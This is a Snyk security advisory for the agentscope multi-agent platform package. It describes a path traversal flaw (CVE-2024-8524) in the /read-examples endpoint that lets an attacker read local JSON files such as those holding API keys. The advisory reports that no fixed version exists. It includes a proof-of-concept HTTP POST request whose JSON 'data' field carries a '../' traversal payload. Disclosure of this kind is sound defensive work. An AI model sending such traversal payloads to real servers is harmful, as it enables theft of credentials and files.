External Control of File Name or Path Affecting agentscope package, versions [0,]


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-PYTHON-AGENTSCOPE-9511411
  • published24 Mar 2025
  • disclosed20 Mar 2025
  • creditranjit-git

Introduced: 20 Mar 2025

NewCVE-2024-8524  (opens in a new tab)
CWE-73  (opens in a new tab)

How to fix?

There is no fixed version for agentscope.

Overview

agentscope is an AgentScope: A Flexible yet Robust Multi-Agent Platform.

Affected versions of this package are vulnerable to External Control of File Name or Path through the /read-examples endpoint. An attacker can read any local JSON file, containing API keys by sending a crafted POST request.

PoC

POST /read-examples HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Tyle: 
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Referer: http://127.0.0.1:5000/workstation
Content-Type: application/json
Content-Length: 115

{"lang":"","data":"/../../../../../../../../../../../../../../../home/user/Desktop/bug_bounty/my-script/test/poc"}

References

CVSS Base Scores

version 4.0
version 3.1